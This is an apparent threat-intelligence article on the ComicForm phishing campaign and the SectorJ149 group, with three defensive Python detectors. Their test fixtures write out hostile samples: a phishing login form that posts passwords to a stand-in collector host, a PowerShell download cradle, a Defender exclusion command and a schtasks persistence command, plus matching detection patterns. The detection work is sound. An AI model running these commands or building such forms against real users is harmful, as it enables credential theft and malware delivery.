Rising Cyber Threats: The ComicForm Phishing Campaign
A phishing campaign targeting organizations in Belarus, Kazakhstan, and Russia has been attributed to a previously undocumented threat group tracked as ComicForm. According to an analysis by cybersecurity firm F6, the group has been active since at least April 2025 and targets a broad range of sectors, including industrial, financial, tourism, biotechnology, research, and trade.
The Mechanism of Attack
ComicForm's attack chain begins with phishing emails carrying subject lines such as “Waiting for the signed document” and “Invoice for Payment.” The recipient is urged to open an attached RAR archive, which contains a Windows executable disguised as a PDF: the file is named along the lines of "Акт_сверки pdf 010.exe," so the word "pdf" inside the name is meant to pass as the document type while the real extension is .exe. The emails are sent from addresses under Russian (.ru), Belarusian (.by), and Kazakh (.kz) domains and are written in both Russian and English to broaden their reach.
Once the executable runs, it acts as an obfuscated .NET loader that deploys a DLL named "MechMatrix Pro.dll." That component in turn launches a second DLL, "Montero.dll," which serves as a dropper for the FormBook information stealer. The dropper also establishes persistence by creating scheduled tasks and reduces the chance of detection by configuring exclusions in Microsoft Defender.
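The lure described above relies entirely on the attachment's name. The following Python is an added example, not F6's or the article's code, that flags archive member names built the same way: an executable extension behind a document keyword, a double extension, or a Unicode bidi control character that reverses how the name renders. Apart from the filename F6 reported, the sample listing is constructed for the example.

```python
import re

# Extensions Windows will execute when the file is double-clicked.
EXECUTABLE_EXTS = {"exe", "scr", "com", "pif", "bat", "cmd", "js", "jse",
                   "vbs", "vbe", "wsf", "hta", "msi", "lnk"}
# Words a lure uses to make an executable read as a document.
DOCUMENT_HINTS = {"pdf", "doc", "docx", "xls", "xlsx", "rtf", "txt"}

# Unicode bidi controls let "invoice\u202Efdp.exe" render as "invoiceexe.pdf".
BIDI_CONTROLS = {"\u202a", "\u202b", "\u202c", "\u202d", "\u202e",
                 "\u2066", "\u2067", "\u2068", "\u2069"}


def check_attachment_name(name: str) -> list[str]:
    """Return reasons a filename looks like an executable posing as a document.

    An empty list means the name shows none of the masquerading tricks."""
    reasons = []
    if any(ch in BIDI_CONTROLS for ch in name):
        reasons.append("bidi override character in name")
    lowered = name.lower()
    if "." not in lowered:
        return reasons
    stem, ext = lowered.rsplit(".", 1)
    if ext not in EXECUTABLE_EXTS:
        return reasons
    # Split the stem on spaces, dots, underscores, hyphens and brackets so both
    # "report.pdf.exe" and "Акт_сверки pdf 010.exe" expose the "pdf" token.
    tokens = re.split(r"[\s._\-()]+", stem)
    hinted = sorted(t for t in set(tokens) if t in DOCUMENT_HINTS)
    if hinted:
        reasons.append(f"executable .{ext} whose name claims to be a {'/'.join(hinted)} document")
    else:
        reasons.append(f"executable .{ext} attached")
    return reasons


def triage_archive(members: list[str]) -> dict[str, list[str]]:
    """Map each suspicious member of an archive listing to its reasons."""
    return {m: r for m in members if (r := check_attachment_name(m))}


# Constructed archive listing; only the first name is the one F6 reported.
SAMPLE_MEMBERS = [
    "Акт_сверки pdf 010.exe",
    "report.pdf.exe",
    "invoice\u202efdp.exe",
    "Счет на оплату.pdf",
    "readme.txt",
]

if __name__ == "__main__":
    for name, why in triage_archive(SAMPLE_MEMBERS).items():
        print(f"{name!r}: {'; '.join(why)}")
```

A mail gateway would feed this the member listing of every archive attachment (a RAR listing needs a third-party reader such as the `rarfile` package, which is why the listing here is a plain list). The name check is deliberately cheap; it is a triage signal to pair with detonation or static analysis of the member itself, not a verdict.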
Intriguing Malware Features
A peculiar feature of the malware is a set of benign links embedded in the binary that point to harmless GIFs of comic superheroes such as Batman; this detail gave the group its name. F6 researcher Vladislav Kugan noted that the images are not used for any malicious purpose and are simply an odd part of the malware's code.
F6 also tied the group's infrastructure to earlier credential-phishing activity against a range of targets: a bank in Belarus in April 2025, a company in Kazakhstan in June 2025, and most recently, on July 25, 2025, Russian manufacturing firms, which received emails asking recipients to verify their accounts through an embedded link.
The Phishing Tactics
Users who click the link are redirected to a fraudulent login page that mimics a legitimate domestic electronic document management system. Whatever credentials are entered are sent to an attacker-controlled domain in an HTTP POST request.
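The tell in that page is structural: a form that collects a password and submits it to a host other than the one serving the page. The following Python is an added example, not code from F6 or the article, that parses a page with the standard library and reports such forms. The two sample pages and the `.example` hostnames are constructed for the example.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit


class _FormCollector(HTMLParser):
    """Collect every <form> with its action, method and input fields."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._flush()
            self._current = {"action": a.get("action") or "",
                             "method": (a.get("method") or "get").lower(),
                             "fields": []}
        elif tag == "input" and self._current is not None:
            self._current["fields"].append(
                (a.get("name") or "", (a.get("type") or "text").lower()))

    def handle_endtag(self, tag):
        if tag == "form":
            self._flush()

    def _flush(self):
        # Also called from close() so a form with no </form> is not lost.
        if self._current is not None:
            self.forms.append(self._current)
            self._current = None

    def close(self):
        super().close()
        self._flush()


def find_credential_exfil_forms(page_url: str, html: str) -> list[dict]:
    """Return password forms whose submit target is a host other than the page's."""
    parser = _FormCollector()
    parser.feed(html)
    parser.close()
    page_host = (urlsplit(page_url).hostname or "").lower()
    findings = []
    for form in parser.forms:
        if not any(kind == "password" for _, kind in form["fields"]):
            continue
        target = urljoin(page_url, form["action"])  # relative actions stay on-host
        target_host = (urlsplit(target).hostname or "").lower()
        if target_host != page_host:
            findings.append({"action": target, "method": form["method"],
                             "fields": [name for name, _ in form["fields"] if name]})
    return findings


# Constructed pages; the hostnames use reserved .example names and are not real.
PAGE_URL = "https://docs-portal.example.com/login"

PHISHING_PAGE = """
<html><body>
<h1>Электронный документооборот</h1>
<form method="POST" action="https://collector.example.net/login">
  <input name="login" type="text">
  <input name="password" type="password">
  <input type="submit" value="Войти">
</form>
</body></html>
"""

LEGIT_PAGE = """
<html><body>
<form method="post" action="/auth">
  <input name="login" type="text">
  <input name="password" type="password">
</form>
</body></html>
"""

if __name__ == "__main__":
    for hit in find_credential_exfil_forms(PAGE_URL, PHISHING_PAGE):
        print(f"credential form posts off-host: {hit['method'].upper()} {hit['action']} fields={hit['fields']}")
    print("legit page findings:", find_credential_exfil_forms(PAGE_URL, LEGIT_PAGE))
```

Two caveats for real use: a strict hostname comparison also flags legitimate sites whose login form posts to an SSO subdomain, so production logic should compare registrable domains or keep an allowlist; and a page that collects the credentials with JavaScript and sends them by `fetch` or `XMLHttpRequest` has no `<form action>` to inspect, so the static check must be backed by observing the outbound request in a sandbox.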
In the case of the Belarusian bank, the phishing email used an invoice lure to trick users into entering their email addresses and phone numbers, which were likewise transmitted to an external domain. Kugan emphasized that the group targets companies across a range of sectors in Russia, Belarus, and Kazakhstan, and that the English-language emails suggest the targeting may extend to organizations in other countries.
Broader Context: Pro-Russian Cyber Activities
Separately, the NSHC ThreatRecon Team has reported on a pro-Russian cybercrime group tracked as SectorJ149 (also known as UAC-0050) that has been active against South Korea, targeting the manufacturing, energy, and semiconductor sectors. The activity was first observed in November 2024 and begins with spear-phishing emails aimed at executives and staff, themed around production-facility purchases or quote requests, that lead to the deployment of malware families including FormBook and Lumma Stealer.
SectorJ149 delivers Visual Basic Script (VBS) files packaged inside Microsoft Cabinet (CAB) archives. When run, the script launches PowerShell commands that fetch executables disguised as image files from code-hosting services such as Bitbucket or GitHub. That first-stage executable then downloads and launches additional payloads.
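Both campaigns leave host-level traces that are easier to catch than the payloads themselves: ComicForm's dropper creates scheduled tasks and Microsoft Defender exclusions, and SectorJ149's VBS spawns PowerShell that downloads "images" from code-hosting sites. The following Python is an added example, not code from F6, NSHC, or the article, that runs a handful of such rules over process-creation events. The events are constructed to mirror Sysmon Event ID 1 fields; the paths, task name, and bitbucket.org repository path in them are made up for the example.

```python
import re

# Constructed process-creation events mirroring Sysmon Event ID 1 fields.
# Paths, the task name and the bitbucket.org repository are made up.
_PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
_LURE = r"C:\Users\user\AppData\Local\Temp\Акт_сверки pdf 010.exe"
SAMPLE_EVENTS = [
    {"image": _PS, "parent_image": _LURE,
     "cmdline": r'powershell -NoP -W Hidden -C "Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming"'},
    {"image": r"C:\Windows\System32\schtasks.exe", "parent_image": _LURE,
     "cmdline": r'schtasks /create /tn "Updater" /tr "C:\Users\user\AppData\Roaming\svc.exe" /sc minute /mo 5'},
    {"image": _PS, "parent_image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'powershell -ep bypass -c (New-Object Net.WebClient).DownloadFile("https://bitbucket.org/acme/pics/raw/main/logo.png","C:\Users\Public\logo.png")'},
    {"image": _PS, "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": r'powershell -c "Get-ChildItem C:\Temp"'},
]

RULES = [
    # Defender exclusion added from the command line (Add-MpPreference is a real cmdlet).
    ("defender_exclusion",
     re.compile(r"Add-MpPreference\b.*-Exclusion(Path|Process|Extension)\b", re.I)),
    # Scheduled task created via schtasks.exe or the PowerShell cmdlet.
    ("scheduled_task_create",
     re.compile(r"\bschtasks(\.exe)?\b.*\s/create\b|\bRegister-ScheduledTask\b", re.I)),
    # Download cradle pulling an image-named file from a code-hosting service.
    ("code_host_image_download",
     re.compile(r"(DownloadFile|DownloadString|Invoke-WebRequest|\biwr\b|Start-BitsTransfer|\bcurl\b)"
                r".*https?://(raw\.githubusercontent\.com|github\.com|bitbucket\.org)/\S+\.(png|jpe?g|gif|bmp)\b",
                re.I)),
]
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def match_event(event: dict) -> list[str]:
    """Return the names of the rules an event trips, in rule order."""
    hits = [name for name, rx in RULES if rx.search(event["cmdline"])]
    # A VBS dropped from a CAB runs under wscript/cscript; that host spawning
    # PowerShell is the SectorJ149 pattern and is rare for interactive users.
    if _basename(event.get("parent_image", "")) in SCRIPT_HOSTS and _basename(event["image"]) in POWERSHELL:
        hits.append("script_host_spawns_powershell")
    return hits


def scan(events: list[dict]) -> list[tuple[int, list[str]]]:
    """Return (index, hits) for every event that trips at least one rule."""
    return [(i, h) for i, e in enumerate(events) if (h := match_event(e))]


if __name__ == "__main__":
    for idx, hits in scan(SAMPLE_EVENTS):
        ev = SAMPLE_EVENTS[idx]
        print(f"event {idx}: {', '.join(hits)}  parent={_basename(ev['parent_image'])}  cmd={ev['cmdline'][:60]}...")
```

Two things a practitioner should tune before deploying these as alerts: `Add-MpPreference` and `schtasks /create` are routinely run by administrators and deployment tooling, so the parent process (here, an executable in a user's Temp directory) carries more signal than the command text alone; and literal matching is defeated by `-EncodedCommand` or string-splitting obfuscation, so decode and normalise the command line before matching and keep the parent-child rule as the fallback that does not depend on the text.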
An Evolving Threat Landscape
The activity of ComicForm and SectorJ149 shows how these groups keep refining their tooling and widening their target lists. Organizations in the affected sectors should treat executable attachments inside archives, unexpected Defender exclusions or scheduled tasks, and login pages that post credentials to a third-party domain as red flags, keep security controls current, and train staff to recognize and report phishing attempts. Engaging outside cybersecurity firms for comprehensive defenses can further help mitigate these persistent threats.